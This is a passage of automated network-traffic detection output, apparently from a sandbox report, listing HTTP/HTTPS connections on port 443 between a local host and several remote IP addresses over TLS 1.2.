Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50360 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 50325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50268 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50359 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50291 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 50326 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50119 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50405
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50404
Source: unknown	Network traffic detected: HTTP traffic on port 50142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50401
Source: unknown	Network traffic detected: HTTP traffic on port 50396 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50405 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50221 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50347 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 50336 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 50313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 50358 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50337
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50336
Source: unknown	Network traffic detected: HTTP traffic on port 50386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50219
Source: unknown	Network traffic detected: HTTP traffic on port 50174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50139 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50331
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50330
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50333
Source: unknown	Network traffic detected: HTTP traffic on port 50225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50334
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50226
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50347
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50228
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50221
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50342
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50223
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50225
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50346
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50238
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50359
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50237
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50358
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50239
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50351
Source: unknown	Network traffic detected: HTTP traffic on port 50317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50232
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50353
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50234
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50233
Source: unknown	Network traffic detected: HTTP traffic on port 50351 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50236
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50357
Source: unknown	Network traffic detected: HTTP traffic on port 50374 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50235
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50356
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50360
Source: unknown	Network traffic detected: HTTP traffic on port 50127 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50249
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50129
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50241
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50362
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50240
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 50150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50364
Source: unknown	Network traffic detected: HTTP traffic on port 50393 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50242
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50245
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50366
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50365
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50368
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50367
Source: unknown	Network traffic detected: HTTP traffic on port 50266 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50250
Source: unknown	Network traffic detected: HTTP traffic on port 50306 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50415
Source: unknown	Network traffic detected: HTTP traffic on port 50315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50129 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50303
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50306
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50308
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50307
Source: unknown	Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50300
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50315
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50436
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50314
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50435
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50317
Source: unknown	Network traffic detected: HTTP traffic on port 50256 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50319
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50311
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50313
Source: unknown	Network traffic detected: HTTP traffic on port 50223 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50326
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50325
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50327
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50448
Source: unknown	Network traffic detected: HTTP traffic on port 50245 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50320
Source: unknown	Network traffic detected: HTTP traffic on port 50058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50324
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50323
Source: unknown	Network traffic detected: HTTP traffic on port 50372 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50327 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50178
Source: unknown	Network traffic detected: HTTP traffic on port 50319 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50180
Source: unknown	Network traffic detected: HTTP traffic on port 50263 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50061
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50060
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50366 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50389 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50065
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50377 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 50331 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50068
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50189
Source: unknown	Network traffic detected: HTTP traffic on port 50240 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50073
Source: unknown	Network traffic detected: HTTP traffic on port 50308 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50147 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50079
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50085
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50084
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50087
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50088
Source: unknown	Network traffic detected: HTTP traffic on port 50079 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50090
Source: unknown	Network traffic detected: HTTP traffic on port 50241 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50093
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 50365 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50139
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50019
Source: unknown	Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50149 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50131
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50372
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50133
Source: unknown	Network traffic detected: HTTP traffic on port 50330 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50374
Source: unknown	Network traffic detected: HTTP traffic on port 50090 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50135
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50256
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50377
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50137
Source: unknown	Network traffic detected: HTTP traffic on port 50353 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50379
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50260
Source: unknown	Network traffic detected: HTTP traffic on port 50230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50149
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50263
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50265
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50386
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50143
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50146
Source: unknown	Network traffic detected: HTTP traffic on port 50226 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50266
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50147
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50268
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50389
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50151
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50393
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50342 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50153
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50152
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50154
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50396
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50157
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50398
Source: unknown	Network traffic detected: HTTP traffic on port 50265 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50242 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50435 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 50137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50307 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50364 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50287
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50290
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50292
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50291
Source: unknown	Network traffic detected: HTTP traffic on port 50287 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50401 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50311 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50260 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50357 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50334 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50448 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50300 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50398 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50237 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50088 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50346 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50133 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50368 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50054 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50379 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50111 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50323 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50436 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50065 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50238 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50404 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50135 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown	Network traffic detected: HTTP traffic on port 49902 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50087 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50356 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 50367 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50250 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 50086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50179 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49937 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 50228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50415 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50146 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50333 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50157 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50239 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49904
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49902

Source: unknown	HTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.7:49887 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49886 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.10.31:443 -> 192.168.2.7:49896 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.7:49902 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.35.43:443 -> 192.168.2.7:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.7:50046 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.7:50061 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.7:50066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50092 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.7:50093 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50096 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.7:50106 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50114 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50113 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50116 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.7:50117 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50121 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50149 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.7:50151 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.91:443 -> 192.168.2.7:50152 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50154 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50155 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.7:50156 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.7:50157 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50179 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50180 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50181 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:50221 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.10.31:443 -> 192.168.2.7:50223 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50238 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50237 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50239 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50234 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50235 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50236 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50242 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.7:50240 version: TLS 1.2
